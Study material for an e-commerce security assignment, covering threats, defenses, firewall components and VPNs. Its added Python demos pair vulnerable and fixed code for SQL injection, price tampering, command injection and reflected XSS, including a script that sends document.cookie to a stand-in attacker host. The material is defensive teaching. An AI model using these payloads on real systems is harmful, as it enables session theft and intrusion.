Mt-23 c: E-commerce, M-commerce & Security

Published on October 2019

MT-23 C: E-COMMERCE, M-COMMERCE & SECURITY

ASSIGNMENT-1 (Max. Marks: 10)

Q.1 What is the need for security?
Q.2 What are threats and vulnerabilities?
Q.3 What are the firewall components?
Q.4 Explain VPN.
Q.5 Explain various methods of attack.
Q.6 State the anti-virus technologies.
Q.7 What is IP address spoofing?
Q.8 Describe digital signature.
Q.9 Explain the process of risk management.
Q.10 Explain IP Security and its security structure.


A-1 Security overview

In the software industry, security has two different perspectives. In the software development community, it describes the security features of a system. Common security features are ensuring that passwords are at least six characters long (a minimum that is too short by current guidance; the point here is that such rules are features) and encrypting sensitive data. For software consumers, it is protection against attacks rather than specific features of the system. Your house may have the latest alarm system and windows with bars, but if you leave your doors unlocked then, regardless of the number of security features your system has, it is still insecure. Hence, security is not a number of features but a system process. The weakest link in the chain determines the security of the system. In this article, we focus on possible attack scenarios in an e-commerce system and provide preventive strategies, including security features, that you can implement. Security has three main concepts: confidentiality, integrity, and availability.

Confidentiality allows only authorized parties to read protected information. Integrity ensures that protected information is not altered by unauthorized parties, or that any such alteration is detected. Availability ensures that authorized parties can use the system and its information when they need to.

Security features

While security features do not guarantee a secure system, they are necessary to build a secure system. Security features fall into four categories:

• Authentication: Verifies that you are who you say you are. It enforces that you are the only one allowed to log on to your Internet banking account.
• Authorization: Allows only you to manipulate your resources, and only in specific ways. This prevents you from increasing the balance of your account or deleting a bill.
• Encryption: Deals with information hiding. It ensures that no one else can spy on your Internet banking transactions.
• Auditing: Keeps a record of operations. Merchants use auditing to prove that you bought a specific item.








Defenses

Despite the existence of hackers and crackers, e-commerce remains a safe and secure activity. The resources available to large companies involved in e-commerce are enormous. The usual defenses are:

• Install personal firewalls for the client machines.
• Store confidential information in encrypted form.
• Encrypt the stream using the Secure Socket Layer (SSL) protocol to protect information flowing between the client and the e-commerce Web site.
• Use appropriate password policies, firewalls, and routine external security audits.
• Use threat model analysis, strict development policies, and external security audits to protect ISV software running the Web site.

Education

Your system is only as secure as the people who use it. If a shopper chooses a weak password, or does not keep their password confidential, then an attacker can pose as that user. This is significant if the compromised password belongs to an administrator of the system. In this case, there is likely physical security involved, because the administrator client may not be exposed outside the firewall. Users need to use good judgement when giving out information, and be educated about possible phishing schemes and other social engineering attacks.

Personal firewalls

When you connect your computer to a network, it becomes vulnerable to attack. A personal firewall helps protect your computer by limiting the types of traffic initiated by and directed to your computer. An intruder who does get in can also scan the hard drive to detect any stored passwords.

Secure Socket Layer (SSL)

Secure Socket Layer (SSL) is a protocol that encrypts data between the shopper's computer and the site's server. When an SSL-protected page is requested, the browser verifies the server's certificate, thereby identifying the server as a trusted entity, and performs a handshake to agree on the session keys. On subsequent requests to the server, the information flowing back and forth is encrypted so that a hacker sniffing the network cannot read the contents. (SSL has since been superseded by TLS; a current deployment should disable SSL 2.0 and 3.0 and use TLS 1.2 or later.)
[Figure: the secure icon as shown in Mozilla Firefox and in Microsoft Internet Explorer]

Server firewalls

A firewall is like the moat surrounding a castle. It ensures that requests can only enter the system from specified ports, and in some cases, ensures that all accesses are only from certain physical machines. A common technique is to set up a demilitarized zone (DMZ) using two firewalls. The outer firewall has ports open that allow incoming and outgoing HTTP requests. This allows the client browser to communicate with the server. A second firewall sits behind the e-commerce servers. This firewall is heavily fortified, and only requests from trusted servers on specific ports are allowed through. Both firewalls use intrusion detection software to detect any unauthorized access attempts. Another common technique used in conjunction with a DMZ is a honey pot server. A honey pot is a resource (for example, a fake payment server) placed in the DMZ to fool the hacker into thinking he has penetrated the inner wall. These servers are closely monitored, and any access by an attacker is detected.

Password policies

You may choose to have different policies for shoppers versus your internal users. For example, you may choose to lock out an administrator after 3 failed login attempts instead of 6. These password policies protect against attacks that attempt to guess the user's password. They ensure that passwords are sufficiently strong that they cannot be easily guessed. The account lockout capability ensures that an automated scheme cannot make more than a few guesses before the account is locked. Note that lockout can itself be abused to deny service to a legitimate user, so pair it with a timed reset and with alerting rather than a permanent lock.

Intrusion detection and audits of security logs

If a shopper makes 6 failed logon attempts, then his account is locked out. In this scenario, the company sends an email to the customer, informing him that his account is locked. This event should also be logged in the system, either by sending an email to the administrator, by writing the event to a security log, or both. You should also log any attempted unauthorized access to the system. If a user logs on and attempts to access resources that he is not entitled to see, or performs actions that he is not entitled to perform, then this indicates that the account may have been co-opted and should be locked out. Analysis of the security logs can detect patterns of suspicious behavior, allowing the administrator to take action. In addition to security logs, use business auditing to monitor activities such as payment processing. You can monitor and review these logs to detect patterns of inappropriate interaction at the business process level.
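As an added example of the log analysis described above (not code from the original article), the following Python script applies the page's thresholds, 3 failures for an administrator and 6 for a shopper, to constructed sample log lines. The log line format, the user names and the addresses are assumptions made for the example; a successful logon resets the counter, reaching the threshold records a lockout event, and any further attempt on a locked account is recorded as its own event for the administrator to review.

```python
"""Failed-logon lockout detection over constructed sample log lines."""
import re
from collections import defaultdict

# Thresholds from the text: administrators lock after 3 failures, shoppers after 6.
LOCKOUT_THRESHOLD = {"admin": 3, "shopper": 6}

# Assumed log format (constructed for this example, not the page's):
# <ISO timestamp> LOGIN <ok|fail> user=<name> role=<admin|shopper> src=<ip>
LINE_RE = re.compile(
    r"^(?P<ts>\S+) LOGIN (?P<result>ok|fail) user=(?P<user>\S+) "
    r"role=(?P<role>admin|shopper) src=(?P<src>\S+)$"
)

# Constructed sample: alice recovers, root (admin) and bob (shopper) get locked.
SAMPLE_LOG = """\
2019-10-01T09:00:01 LOGIN fail user=alice role=shopper src=203.0.113.5
2019-10-01T09:00:03 LOGIN fail user=alice role=shopper src=203.0.113.5
2019-10-01T09:00:05 LOGIN ok user=alice role=shopper src=203.0.113.5
2019-10-01T09:01:00 LOGIN fail user=root role=admin src=198.51.100.9
2019-10-01T09:01:01 LOGIN fail user=root role=admin src=198.51.100.9
2019-10-01T09:01:02 LOGIN fail user=root role=admin src=198.51.100.9
2019-10-01T09:01:03 LOGIN fail user=root role=admin src=198.51.100.9
2019-10-01T09:02:00 LOGIN fail user=bob role=shopper src=192.0.2.7
2019-10-01T09:02:01 LOGIN fail user=bob role=shopper src=192.0.2.7
2019-10-01T09:02:02 LOGIN fail user=bob role=shopper src=192.0.2.7
2019-10-01T09:02:03 LOGIN fail user=bob role=shopper src=192.0.2.7
2019-10-01T09:02:04 LOGIN fail user=bob role=shopper src=192.0.2.7
2019-10-01T09:02:05 LOGIN fail user=bob role=shopper src=192.0.2.7
2019-10-01T09:02:06 LOGIN fail user=bob role=shopper src=192.0.2.7
"""


def analyze(log_text):
    """Return (locked_users, events).

    events is a list of tuples, in log order:
      ("lockout", user, role, src, ts)               threshold reached
      ("attempt_on_locked_account", user, src, ts)   activity after lockout
      ("unparsed", line)                              line did not match LINE_RE
    """
    failures = defaultdict(int)
    locked = set()
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            events.append(("unparsed", line))
            continue
        user, role, result = m["user"], m["role"], m["result"]
        if user in locked:
            # Keep watching: the attacker may not know the account is locked.
            events.append(("attempt_on_locked_account", user, m["src"], m["ts"]))
            continue
        if result == "ok":
            failures[user] = 0          # successful logon resets the counter
            continue
        failures[user] += 1
        if failures[user] >= LOCKOUT_THRESHOLD[role]:
            locked.add(user)
            events.append(("lockout", user, role, m["src"], m["ts"]))
    return locked, events


if __name__ == "__main__":
    locked_users, found = analyze(SAMPLE_LOG)
    print("locked:", sorted(locked_users))
    for event in found:
        print(*event)
```

A production version would also key the counters on source address and apply a time window, so that a slow guessing campaign spread over days is still caught and a legitimate user's stale failures do not count against them forever.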

A-2 Common security vulnerabilities in e-commerce systems

1. Introduction

The tremendous increase in online transactions has been accompanied by an equal rise in the number and type of attacks against the security of online payment systems. Some of these attacks have utilized vulnerabilities that have been published in reusable third-party components utilized by websites, such as shopping cart software. Other attacks have used vulnerabilities that are common in any web application, such as SQL injection or cross-site scripting. This article discusses these vulnerabilities with examples, either from the set of known vulnerabilities, or those discovered during the author's penetration testing assignments. The different types of vulnerabilities discussed here are SQL injection, cross-site scripting, information disclosure, path disclosure, price manipulation, and buffer overflows. Successful exploitation of these vulnerabilities can lead to a wide range of results. Information and path disclosure vulnerabilities will typically act as initial stages leading to further exploitation. SQL injection or price manipulation attacks could cripple the website, compromise confidentiality, and in the worst cases cause the e-commerce business to shut down completely. Wherever examples of such vulnerabilities are given in advisories published by Bugtraq, we have given the Bugtraq ID in square brackets. Details of the vulnerability may be viewed by navigating to http://www.securityfocus.com/bid/<bid_number> (the SecurityFocus database is no longer maintained, but the IDs remain usable as references).

2. Vulnerabilities

2.1 Background

There are a number of reasons why security vulnerabilities arise in shopping cart and online payment systems. The reasons are not exclusive to these systems, but their impact becomes much greater simply because of the wide exposure that an online website has, and because of the financial nature of the transactions. One of the main reasons for such vulnerabilities is the fact that web application developers are often not very well versed in secure programming techniques. As a result, security of the application is not necessarily one of the design goals. This is exacerbated by the rush to meet deadlines in the fast-moving e-commerce world. Even one day's delay in publishing a brand new feature on your website could allow a competitor to steal a march over you.
We have typically found this in cases where e-commerce sites need to add functionality rapidly to deal with a sudden change in the business environment or simply to stay ahead of the competition. In such a scenario, the attitude is to get the functionality online; security can always be taken care of later. Another reason why security vulnerabilities appear is the inherent complexity of most online systems. Nowadays, users place very demanding requirements on their e-commerce providers, and this requires complex designs and programming logic.

2.2 SQL Injection

SQL injection refers to the insertion of SQL meta-characters in user input, such that the attacker's queries are executed by the back-end database. Typically, attackers will first determine if a site is vulnerable to such an attack by sending in the single-quote (') character. The results of an SQL injection attack on a vulnerable site may range from a detailed error message that discloses the back-end technology being used, to access to restricted areas of the site because the attacker manipulated the query into an always-true Boolean value, to the execution of operating system commands. SQL injection techniques differ depending on the type of database being used. For instance, SQL injection on an Oracle database is done primarily using the UNION keyword [ref 1] and is much more difficult than on MS SQL Server, where multiple queries can be executed by separating them with a semicolon [ref 2]. In its default configuration at the time of the original article, MS SQL Server ran with Local System privileges and had the 'xp_cmdshell' extended procedure available, which allows execution of operating system commands (since SQL Server 2005, xp_cmdshell is disabled by default, and the service should run under a low-privilege account). The most publicized occurrences of this vulnerability were on the e-commerce sites of Guess.com and PetCo.com.

2.3 Price Manipulation

This is a vulnerability that is almost completely unique to online shopping carts and payment gateways. In the most common occurrence of this vulnerability, the total payable price of the purchased goods is stored in a hidden HTML field of a dynamically generated web page. An attacker can use a web application proxy such as Achilles [ref 5] to simply modify the amount that is payable when this information flows from the user's browser to the web server. The original article shows a snapshot of just such a vulnerability, discovered in one of the author's penetration testing assignments (not reproduced here).

2.4 Buffer overflows

Buffer overflow vulnerabilities are not very common in shopping cart or other web applications written in Perl, PHP, ASP, etc. However, sending a large number of bytes to web applications that are not geared to deal with them can have unexpected consequences. In one of the author's penetration testing assignments, it was possible to disclose the path of the PHP functions being used by sending a very large value in the input fields. As the sanitized snapshot in the original article showed, when 6000 or more bytes were fed into a particular field, the back-end PHP script was unable to process them and the error that was displayed revealed the location of these PHP functions. Multiple buffer overflows were also discovered in the PDGSoft Shopping Cart [bid 1256], which potentially allowed the attacker to execute code of his choice by overwriting the saved return address.

2.5 Cross-site scripting

The cross-site scripting (XSS) [ref 6] attack is primarily targeted against the end user and leverages two factors:

1. The lack of input and output validation by the web application.
2. The trust placed by the end user in a URL that carries the vulnerable web site's name.

The XSS attack requires a web form that takes in user input, processes it, and prints out the results on a web page which also contains the user's original input. It is most commonly found in 'search' features, where the search logic will print out the results along with a line such as 'Results for <user_supplied_input>'. In this case, if the user input is printed out without being encoded, then an attacker can embed JavaScript by supplying it as part of the input. By crafting a URL which contains this JavaScript, a victim can be social-engineered into clicking on it, and the script executes in the victim's browser in the context of the vulnerable site. In most cases, the attacker would craft the URL in order to try and steal the user's cookie, which would probably contain the session ID and other sensitive information. The JavaScript could also be coded to redirect the user to the attacker's website, where malicious code could be launched using ActiveX controls or by exploiting browser vulnerabilities such as those in Internet Explorer or Netscape Navigator. Alternatively, the JavaScript can be used to redirect the user to a site that looks similar to the original web site and requests the user to enter sensitive information such as his authentication details for that web site, his credit card number or social security number. The original article illustrates a related attack with a screenshot that is not reproduced here.
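As an added example for section 2.2 (not code from the original article), the following Python snippet shows the single-quote probe and the always-true clause from the text against a login query built by string concatenation, beside the parameterized query that stops them. The table, the two accounts and the login functions are constructed for the example; SQLite is used only because it ships with Python, and the comment syntax (`--`) and always-true trick work the same way on the databases the text names.

```python
"""SQL injection (section 2.2): the single-quote probe and an always-true WHERE
clause against a string-built query, beside the parameterized query that stops it.
Added example; the table, rows and login functions are constructed for it."""
import sqlite3


def make_db():
    """In-memory SQLite with two constructed accounts."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", "s3cret"), ("admin", "hunter2")])
    return db


def login_vulnerable(db, username, password):
    """Builds the query by string concatenation: quotes in the input become SQL."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return [row[0] for row in db.execute(sql)]


def login_safe(db, username, password):
    """Parameterized query: the driver passes values separately, so a quote is data."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in db.execute(sql, (username, password))]


def probe_single_quote(db, login):
    """The attacker's first step from the text: send a lone quote and watch for a
    database error. Returns the error text (what a verbose error page would leak)
    or None when the input was handled as data."""
    try:
        login(db, "'", "x")
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)


# Payloads from the text: comment out the password check, or force an always-true clause.
BYPASS_COMMENT = "admin' --"
ALWAYS_TRUE = "x' OR '1'='1"


if __name__ == "__main__":
    conn = make_db()
    print("probe (vulnerable):", probe_single_quote(conn, login_vulnerable))
    print("probe (safe):      ", probe_single_quote(conn, login_safe))
    print("bypass (vulnerable):", login_vulnerable(conn, BYPASS_COMMENT, "wrong"))
    print("bypass (safe):      ", login_safe(conn, BYPASS_COMMENT, "wrong"))
```

The always-true payload works because `AND` binds tighter than `OR`: the clause becomes `username = 'x' OR ('1'='1' AND password = 'x') OR '1'='1'`, which is true for every row, so the vulnerable function returns every account.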
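As an added example for section 2.3 (not code from the original article), the following Python snippet contrasts a checkout that charges whatever the hidden `total` field says with one that recomputes the total from the server-side cart and only uses the posted field to raise a tamper alert. The catalog, the session cart, the quantity limit and the form fields are constructed for the example; `intercept_and_edit` stands in for what an intercepting proxy such as Achilles lets the attacker do to the request in transit.

```python
"""Price manipulation (section 2.3): a checkout that charges the hidden 'total'
field, beside one that recomputes the total from the server-side cart and flags
the tampered field. Added example; catalog, cart and form are constructed."""

CATALOG = {"sku-100": 49.99, "sku-200": 5.00}          # prices live only on the server
SESSIONS = {"sess-1": {"sku-100": 1, "sku-200": 2}}    # cart keyed by session id
MAX_QTY = 99                                           # assumed business limit


def server_total(cart):
    """Authoritative total: catalog price times quantity, never client input."""
    return round(sum(CATALOG[sku] * qty for sku, qty in cart.items()), 2)


def render_hidden_total(session_id):
    """The page pattern from the text: the payable amount is written into a hidden field."""
    return {"total": f"{server_total(SESSIONS[session_id]):.2f}"}


def intercept_and_edit(form, **changes):
    """What an intercepting proxy lets the attacker do between browser and server."""
    return {**form, **changes}


def checkout_vulnerable(session_id, form):
    """Charges the client-supplied amount: the vulnerability as described."""
    return {"charged": float(form["total"]), "tamper_detected": False}


def checkout_safe(session_id, form):
    """Recomputes from the cart; the posted 'total' is compared only to raise an alert."""
    cart = SESSIONS[session_id]
    for sku, qty in cart.items():
        if sku not in CATALOG or not 1 <= qty <= MAX_QTY:
            raise ValueError(f"invalid cart line {sku}={qty}")
    total = server_total(cart)
    posted = form.get("total")
    tampered = posted is not None and round(float(posted), 2) != total
    return {"charged": total, "tamper_detected": tampered}


if __name__ == "__main__":
    honest = render_hidden_total("sess-1")
    edited = intercept_and_edit(honest, total="0.01")
    print("vulnerable:", checkout_vulnerable("sess-1", edited))
    print("safe:      ", checkout_safe("sess-1", edited))
```

The tamper flag is worth logging and alerting on even though the safe handler is not fooled: a mismatched total is a reliable signal that someone is probing the checkout with a proxy.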
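As an added example for section 2.5 (not code from the original article), the following Python snippet builds the crafted search URL the text describes, with a script that ships `document.cookie` to the attacker, and runs its query through a search page that echoes the input raw and one that HTML-encodes it. The site and attacker host names are made up. Encoding output is the fix the text calls for; in addition, marking the session cookie `HttpOnly` keeps `document.cookie` from exposing it even if an encoding gap remains.

```python
"""Reflected XSS (section 2.5): a search page that echoes the query raw, beside one
that HTML-encodes it, driven by the crafted cookie-stealing URL from the text.
Added example; site and attacker host names are made up."""
import html
from urllib.parse import parse_qs, urlencode, urlparse


def search_page_vulnerable(query):
    """'Results for <user_supplied_input>' with the input printed as-is."""
    return f"<h2>Results for {query}</h2>"


def search_page_safe(query):
    """Encode for the HTML text context; quote=True also covers attribute values."""
    return f"<h2>Results for {html.escape(query, quote=True)}</h2>"


def craft_attack_url(site, attacker_host):
    """The link a victim is social-engineered into clicking: it carries the site's
    own name, with a script in the query that sends document.cookie to the attacker."""
    payload = (f'<script>new Image().src="http://{attacker_host}/?c="'
               '+document.cookie</script>')
    return f"{site}/search?{urlencode({'q': payload})}"


def query_from_url(url):
    """What the server-side search handler extracts from the request."""
    return parse_qs(urlparse(url).query)["q"][0]


def contains_script(page):
    """Stand-in for the browser: would the markup contain a script element?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    url = craft_attack_url("http://shop.example", "evil.example")
    q = query_from_url(url)
    print(url)
    print("vulnerable:", search_page_vulnerable(q))
    print("safe:      ", search_page_safe(q))
```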


2.6 Remote command execution

The most devastating web application vulnerabilities occur when the CGI script allows an attacker to execute operating system commands due to inadequate input validation. This is most common with the use of the 'system' call in Perl and PHP scripts. Using a command separator and other shell metacharacters, it is possible for the attacker to execute commands with the privileges of the web server. For instance, Hassan Consulting's Shopping Cart allowed remote command execution [bid 3308] because shell metacharacters such as | ; & were not rejected by the software. However, directory traversal was not possible in this software.

2.7 Weak authentication and authorization

Authentication mechanisms that do not prohibit multiple failed logins can be attacked using tools such as Brutus [ref 8]. Similarly, if the web site uses HTTP Basic Authentication or does not pass session IDs over SSL (Secure Sockets Layer), an attacker can sniff the traffic to discover the user's authentication and/or authorization credentials. Since HTTP is a stateless protocol, web applications commonly maintain state using session IDs or transaction IDs stored in a cookie on the user's system. Thus this session ID becomes the only way that the web application can determine the online identity of the user, so it must be unpredictable, sent only over the encrypted channel, and invalidated on logout.

3. Countermeasures

The most important point is to build security into the web application at the design stage itself. In fact, one of the key activities during the design phase should be a detailed risk assessment exercise. Here, the team must identify the key information assets that the web application will be dealing with. These could include configuration information, user transaction details, session IDs, credit card numbers, etc. Each of these information assets needs to be classified in terms of sensitivity. Depending upon the tentative architecture chosen, the developers along with security experts must analyze the threats, impact, vulnerabilities and threat probabilities for the system. Once these risks are listed out, system countermeasures must be designed and, if necessary, the architecture itself may be modified. Countermeasures should also include strict input validation routines, a 3-tier modular architecture, use of open-source cryptographic standards, and other secure coding practices.
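As an added example for section 2.6 (not code from the original article), the following Python snippet shows a lookup handler that interpolates user input into a shell command, the Python equivalent of the Perl/PHP `system("lookup $id")` the text describes, beside a handler that passes an argv list with no shell and allow-lists the value. The real back-end command is stood in for by `echo` so the example runs anywhere with `/bin/sh`, and the customer-id format is an assumption. An allow-list is used rather than rejecting `|`, `;` and `&`, because a deny-list is always one forgotten metacharacter (backticks, `$( )`, newline) away from bypass.

```python
"""Remote command execution (section 2.6): a lookup that interpolates user input
into a shell command, beside one that passes argv without a shell and allow-lists
the value. Added example; 'echo' stands in for the back-end command."""
import re
import subprocess

ID_RE = re.compile(r"[A-Za-z0-9_-]{1,32}")   # assumed id format; allow-list, not deny-list


def lookup_vulnerable(customer_id):
    """Equivalent of system("lookup $id"): /bin/sh parses ; | & ` $( ) in the input."""
    proc = subprocess.run("echo lookup " + customer_id, shell=True,
                          capture_output=True, text=True)
    return proc.stdout


def lookup_safe(customer_id):
    """No shell: the argv list goes straight to execve, after the value is validated."""
    if not ID_RE.fullmatch(customer_id):
        raise ValueError("invalid customer id")
    proc = subprocess.run(["echo", "lookup", customer_id],
                          capture_output=True, text=True)
    return proc.stdout


def safe_rejects(customer_id):
    """True when lookup_safe refuses the value instead of running anything."""
    try:
        lookup_safe(customer_id)
        return False
    except ValueError:
        return True


def injected(output, marker="INJECTED"):
    """True when the attacker's appended command ran: its marker is on its own line."""
    return marker in output.splitlines()


if __name__ == "__main__":
    attack = "42; echo INJECTED"
    print("vulnerable output:", repr(lookup_vulnerable(attack)))
    print("safe rejects attack:", safe_rejects(attack))
    print("safe output:", repr(lookup_safe("42")))
```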

Ecommerce Threats

E-commerce has forever revolutionized the way business is done. Retail has come a long way from the days of physical transactions that were time consuming and prone to errors. However, e-commerce has unavoidably invited its share of trouble makers. As much as e-commerce simplifies transactions, it is occasionally plagued by serious concerns that jeopardize its security as a medium of exchanging money and information. Major threats to present-day e-commerce include:

Breach of security: money thefts

E-commerce services are about transactions, and transactions are very largely driven by money. This attracts hackers, crackers and everyone with the knowledge of exploiting loopholes in a system. Once a chink in the armor is discovered, they feed the system (and its users) with numerous bits of dubious information to extract confidential data (phishing). This is particularly dangerous because the data extracted may be credit card numbers, passwords, transaction details and the like. Payment gateways are also vulnerable to interception by unethical users: cleverly crafted strategies can siphon off part or all of the amount being transferred from the user to the online vendor.

Identity thefts

Hackers often gain access to sensitive information such as user accounts, user details, addresses and confidential personal information. It is a significant threat in view of the privileges one can obtain with a false identity. For instance, one can effortlessly log in to an online shopping site under a stolen identity, make purchases worth thousands of dollars, and have the order delivered to an address other than the one on record. One can easily see how those orders could be received by the impostor without arousing suspicion. While the fraudster gains, the original account holder continues to pay the price until the offender is caught.

Threats to the system

Viruses, worms and Trojans are very deceptive methods of stealing information. Unless a sound virus-protection strategy is used by the e-commerce solutions firm, these malicious agents can compromise the credibility of all e-commerce web solution services. Often planted by individuals for reasons known best to them alone, viruses breed within the systems and multiply at astonishing speeds. Unchecked, they can potentially cripple the entire system.

Solutions

Authentication

Most notable are the advances in identification and elimination of non-genuine users. E-commerce service designers now use multi-level identification protocols such as security questions, encrypted (properly, salted and hashed) passwords, biometrics and others to confirm the identity of their customers. These steps have found wide favor due to their effectiveness in weeding out unwelcome access.

Intrusion check

The issue of tackling viruses and their like has also seen rapid development, with antivirus vendors releasing strong anti-virus products. Firewalls are another common way of implementing security measures; these programs restrict access to and from the system to pre-checked users and access points.

Educating users

E-commerce is run primarily by users. Thus, e-commerce service providers have also turned to educating users about safe practices that make the entire operation trouble free. Recent issues such as phishing have been tackled to a good extent by informing genuine users of the perils of disclosing their confidential information to unauthorized information seekers.


A-3 Firewall components

A built-in firewall is provided for scenarios where servers (managers) are separated from destination clients (agents) by one or more intermediary networks because of firewall policies or address space concerns. The firewall components are used to tunnel traffic between network zones, and can be chained together to allow for multiple hops.

The firewall components are intended to be used with the scalable distribution infrastructure. They do not carry communication between the provisioning server and the common agent on port 9510 for any provisioning workflow that you want to run. If your scenario requires a provisioning workflow to communicate with the common agent, then the provisioning server must be able to reach the common agent on its listening port (9510 by default) or via an alternative protocol. The following steps are the high-level, functional overview of the firewall components given as a graphic in the original (not reproduced here):

1. An agent connects to the gateway service and sends a command to connect to the Agent Manager on the provisioning server.
2. The gateway service sends a command to the gateway manager.
3. The gateway manager creates a connection to the manager.
4. The gateway manager creates a connection to the gateway service using the proxy relay.
5. The gateway manager ties connections 3 and 4 to form a virtual connection from the manager to the gateway service.
6. The gateway service ties connections 1 and 4 to form a virtual connection from the manager to the agent.

Proxy relay

The firewall components operate by opening the default port 1960 on the proxy relay system and then listening on this port for routed traffic. When a connection is made to this port, the proxy relay expects control information to be sent, which instructs the relay to create a new TCP/IP connection to the specified address and port. Once the new connection is created, the two input and output stream connections are joined together using a thread that reads data from one input stream and writes it to the other output stream. Each proxy relay is configured with an access control list (ACL) which determines which incoming and outgoing connections to allow. The ACL is the relay's security boundary: a relay whose ACL permits any destination is an open forwarder into the inner network, so it should list only the manager and agent addresses and ports that the deployment actually needs.

Gateway manager and service

The gateway includes the gateway manager and the gateway service. The gateway is used to tunnel TCP/IP traffic from point 1 through the gateway service and gateway manager to the final destination 2. Each gateway manager can connect to and manage one or more gateway services. In turn, each gateway service can be managed by one or more gateway managers. For gateway communications, all connections are created from the gateway manager to the gateway service.

For example, a target computer (1) must create a TCP/IP connection to a resource (2). Because of unidirectional firewall rules, connections can only originate from the network where the resource (2) resides. Using the gateway, the target computer (1) creates a connection to the gateway service (3), which is allowed, as they are in the same network. A gateway manager (4) creates a connection to the resource (2), which resides in the same network as the manager. Next, the gateway manager (4) creates a new connection to the gateway service (3). Then, using the input and output streams, the original connection from the target computer (1) to the gateway service (3) acts as though it is connected directly to the resource (2).

When the gateway manager and gateway service are operating correctly, there is a persistent TCP/IP connection from the gateway manager to the gateway service. This "command channel" enables the gateway service to alert the gateway manager when it receives a new connection request. A periodic "heartbeat" signal is sent to keep the connection alive. If the command channel is closed, the gateway manager will attempt to reconnect periodically. The gateway service will automatically stop listening on that particular gateway manager's service ports when the connection is broken.

The gateway service can be configured to advertise a particular service. To use this feature, User Datagram Protocol (UDP) broadcasting must be enabled for the local subnet. A target computer can discover a service by sending a broadcast UDP packet containing the service's name. If the gateway service receives the UDP packet and it currently advertises that service name, then it responds with an addressed UDP packet which contains the port number that the service is listening on. The target computer can then use the source address of the UDP packet and the port contained within the packet to connect to the given service. Because this discovery reply is not authenticated, any host on the subnet can answer such a broadcast, so enable advertising only on subnets you trust.

Configuring the firewall components involves setting up the gateway manager, starting the gateway service and gateway manager, and enabling the firewall support for the common agent.
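As an added example of the proxy relay described above (not the product's code), the following Python program implements the same shape: a listener that reads one line of control information naming a host and port, checks an access control list, opens the onward TCP connection and joins the two streams with one pump thread per direction. The control-line format (`CONNECT host:port`), the ACL rule shape, the `OK`/`DENIED` reply and the use of OS-assigned loopback ports are assumptions made for the example; a small echo server stands in for the resource behind the relay.

```python
"""A minimal proxy relay: control line, ACL check, onward connect, stream join.
Added example, not the product's code; control-line format, ACL shape and the
loopback test ports are assumptions made for it."""
import socket
import threading


class Acl:
    """Allow-list of (client_host, target_host, target_port); '*' matches anything.
    This is the relay's only security boundary."""

    def __init__(self, rules):
        self.rules = rules

    def allows(self, client_host, target_host, target_port):
        return any(c in ("*", client_host) and h in ("*", target_host)
                   and p in ("*", target_port) for c, h, p in self.rules)


def parse_control(line):
    """'CONNECT host:port' -> (host, int port); anything else is rejected."""
    parts = line.strip().split()
    if len(parts) != 2 or parts[0] != "CONNECT" or ":" not in parts[1]:
        raise ValueError("bad control line")
    host, port = parts[1].rsplit(":", 1)
    return host, int(port)


def pump(src, dst):
    """Copy bytes one way until EOF, then half-close the destination's write side."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def handle(client, acl):
    """Serve one relay client: control line, ACL check, connect, then join streams."""
    raw = client.makefile("rb", buffering=0)   # unbuffered: never swallow payload bytes
    try:
        host, port = parse_control(raw.readline().decode())
        if not acl.allows(client.getpeername()[0], host, port):
            raise PermissionError("denied by ACL")
        target = socket.create_connection((host, port), timeout=5)
        target.settimeout(None)
    except (ValueError, OSError):
        client.sendall(b"DENIED\n")
        client.close()
        return
    client.sendall(b"OK\n")
    threading.Thread(target=pump, args=(client, target), daemon=True).start()
    threading.Thread(target=pump, args=(target, client), daemon=True).start()


def _listen(on_accept):
    """Bind an OS-assigned loopback port, serve accepts in threads, return the port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen()

    def loop():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=on_accept, args=(conn,), daemon=True).start()

    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1]


def serve(acl):
    """Start the relay and return its port (the product's default would be 1960)."""
    return _listen(lambda conn: handle(conn, acl))


def echo_server():
    """Stand-in for the resource behind the relay: echoes what it receives."""
    return _listen(lambda conn: pump(conn, conn))


def through_relay(relay_port, target_host, target_port, payload):
    """Client side: send the control line, then the payload; return (status, reply)."""
    s = socket.create_connection(("127.0.0.1", relay_port), timeout=5)
    s.sendall(f"CONNECT {target_host}:{target_port}\n".encode())
    f = s.makefile("rb")
    status = f.readline().strip().decode()
    reply = b""
    if status == "OK":
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        reply = f.read()
    s.close()
    return status, reply


if __name__ == "__main__":
    target = echo_server()
    relay = serve(Acl([("127.0.0.1", "127.0.0.1", target)]))
    print(through_relay(relay, "127.0.0.1", target, b"hello through the relay"))
    print(through_relay(relay, "127.0.0.1", 1, b"denied"))
```

The relay reads the control line unbuffered on purpose: a buffered reader could consume the first payload bytes along with the control line and they would never reach the target. The ACL is consulted with the client's real peer address, not anything the client claims in the control line.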

A-4 A virtual private network (VPN) is a computer network that is implemented in an additional software layer (overlay) on top of an existing larger network for the purpose of creating a private scope of computer communications or providing a secure extension of a private network into an insecure network such as the Internet. The links between nodes of a virtual private network are formed over logical connections or virtual circuits between hosts of the larger network. The link layer protocols of the virtual network are said to be tunneled through the underlying transport network. One common application is to secure communications through the public Internet, but a VPN does not need to have explicit security features such as authentication or traffic encryption. For example, VPNs can also be used to separate the traffic of different user communities over an underlying network with strong security features, or to provide access to a network via customized or private routing mechanisms.


VPNs are often installed by organizations to provide remote access to a secure organizational network. Generally, a VPN has a network topology more complex than a point-to-point connection. VPNs are also used to mask the IP address of individual computers within the Internet in order, for instance, to surf the World Wide Web anonymously or to access location-restricted services, such as Internet television.

